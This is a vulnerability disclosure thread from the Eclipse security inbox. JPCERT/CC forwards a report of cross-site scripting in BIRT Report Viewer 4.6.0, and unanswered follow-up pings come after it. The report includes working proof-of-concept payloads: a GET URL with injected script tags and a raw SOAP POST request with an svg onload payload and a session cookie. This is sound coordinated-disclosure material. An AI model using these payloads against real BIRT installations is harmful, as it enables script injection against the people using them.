Community
Participate
Working Groups
From the security@eclipse.org inbox: Dear Eclipse Security Team, Hello. This is Hirozumi Nihonmatsu from JPCERT/CC. Attached to this email is the original report and the details of the reported vulnerability. The zip file is password-protected, and the password will be notified by a separate email. - BIRT vulnerable to cross-site scripting Please read through the report and return to us with the information such as; -validate the products, and whether the reported vulnerability is confirmed or not -solutions (e.g., patch or module update) -workarounds if any -estimated time for creation of fixes -preferable date for public release on your site *we will also publish an advisory for this issue on our vulnerability knowledge base, JVN, http://jvn.jp, http://jvn.jp/en/, synchronizing with your release schedule. **Caution** We have assigned the Vulnerability ID (VN) and its tracking number (TN) for this vulnerability issue; VN: JVN#53394617 / TN: JPCERT#95206031 Please be sure to include these numbers in the subject line for future communication with us. We appreciate your cooperation on this. If you have any questions and concerns, please do not hesitate to contact us any time. Thank you in advance for your attention on this matter. We are looking forward to hearing from you. Sincerely yours, Hirozumi Nihonmatsu JPCERT/CC Vulnerability Handling Team ================================================================== JPCERT Coordination Center (JPCERT/CC) TEL: +81-3-3518-4600 FAX: +81-3-3518-4602 EMAIL: vuls@jpcert.or.jp PGP key: 0xE46138B5: E9EA 6B5F 7C3B F3D6 5539 F758 4E9D 7E92 E461 38B5 https://www.jpcert.or.jp/english/
----------------------------------------------------------------- Vulnerability Report for JVN#53394617 (begins here) ----------------------------------------------------------------- [Title and VUL ID] - JVN#53394617 - BIRT vulnerable to cross-site scripting [Original finder/reporter's information] - Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. [Affected product and version] - BIRT Report Viewer ver.4.6.0 http://www.eclipse.org/birt/ https://projects.eclipse.org/projects/birt [Reproduction Procedure] <Scenario 1> Put below malicious link which will be sent with a GET parameter to the browser. http://<Hostname>/birt-viewer/run?__report=report%2FR_S05.rptdesign&__masterpage=true&__format=html&__parameterpage=false&PROJECT_ID=2&TICKET_ID=1xxx&__islocale=TICKET_IDxxx&TARGET_DATE_FROM=2011%2F04%2F01&__islocale=TARGET_DATE_FROM&TARGET_DATE_TO=2011%2F12%2F25&__islocale=TARGET_DATE_TO&INDEX=0&__islocale=INDEX&HELP_FLAG=true"><script>alert(7)</script>xxx&__islocale=HELP_FLAG&NEW_WINDOW_FLAG=false"><script>alert(6)</script>xxx&__islocale=NEW_WINDOW_FLAG&BIND_OFFSET=10"><script>alert(5)</script>xxx&__islocale=BIND_OFFSET&LIMMIT=10"><script>alert(4)</script>xxx&__islocale=LIMMIT&DRILL_FLAG=true"><script>alert(3)</script>xxxxx&__islocale=DRILL_FLAGxxxxx&DRILL_FIRST_FLAG=true"><script>alert(2)</script>xxxx&__islocale=DRILL_FIRST_FLAG&NAVI_CREATE_FLAG=NAVI_CREATE_FLAG"><script>alert(1)</script>xxxxxx&__islocale=NAVI_CREATE_FLAG <Scenario 2> POST /birt-viewer/frameset?__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html&__islocale=NAVI_CREATE_FLAG&__id=birtViewerR_M02&__sessionId=20170403_102433_278 HTTP/1.1 Host: 192.168.153.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: ja,en-US;q=0.7,en;q=0.3 Referer: http://192.168.153.132/birt-viewer/frameset?__id=birtViewerR_M02&__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.4.0 Content-Type: application/x-www-form-urlencoded, text/xml; charset=UTF-8 SOAPAction: "" request-type: SOAP Content-Length: 1350 Cookie: JSESSIONID=78E16375AA18933FBEB220A740EB64B6; _redmine_session=BAh7DToVaW1wb3J0ZXJfd3JhcHBlciIGIiIVZmlsZXNfaW5kZXhfc29ydCINZmlsZW5hbWU6DHVzZXJfaWRpBjoPc2Vzc2lvbl9pZCIlOTBiZDUyODhjZmJhNDRjNTUzODkwNTI0YjQ1MDc3MGM6EF9jc3JmX3Rva2VuIjFSMkJDWVJtRUpUYU1JTm5LcWN3TVZqdDBINmpac0I5T244MjdjdWdCWDhNPToWaW1wb3J0ZXJfZW5jb2RpbmciBlU6FWltcG9ydGVyX3RtcGZpbGUiNS90bXAvcmVkbWluZV9pbXBvcnRlcl9pcGZzYW1wbGVwcm9qZWN0X2FkbWluLmNzdjoWaW1wb3J0ZXJfc3BsaXR0ZXIiBiw%3D--9b9d1429e54db160dfa79ce9ec1f158865afc50d Connection: close <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>ChangeParameter</Operator><Oprand><Name>CONDITION</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__CONDITION</Name><Value>?????°?????????</Value></Oprand><Oprand><Name>__islocale</Name><Value>THRESHOLD</Value></Oprand><Oprand><Name>THRESHOLD</Name><Value><svg onload=alert()></Value></Oprand><Oprand><Name>__isdisplay__THRESHOLD</Name><Value><svg onload=alert()></Value></Oprand><Oprand><Name>USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>__isdisplay__LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>__isdisplay__BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__svg</Name><Value>false</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value>2017-3-3-10-25-31-70</Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>] [Proof-of-Concept Code] Written in "Reproduction Procedure" section above. [CVSSv2 and v3 Scores] ----------------------------------------------------------------- CVSSv2 ----------------------------------------------------------------- AV:N/AC:M/Au:N/C:N/I:P/A:N/BS:4.3 ----------------------------------------------------------------- CVSSv3 ----------------------------------------------------------------- CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/BS:6.1 ----------------------------------------------------------------- ----------------------------------------------------------------- Vulnerability Report for JVN#53394617 (ends here) -----------------------------------------------------------------
Has anyone had time to look at this?
Hello? Does anybody intend to look at this?
ping?
Project team, there's help regarding how we handle vulnerability reports in the handbook. https://www.eclipse.org/projects/handbook/#vulnerability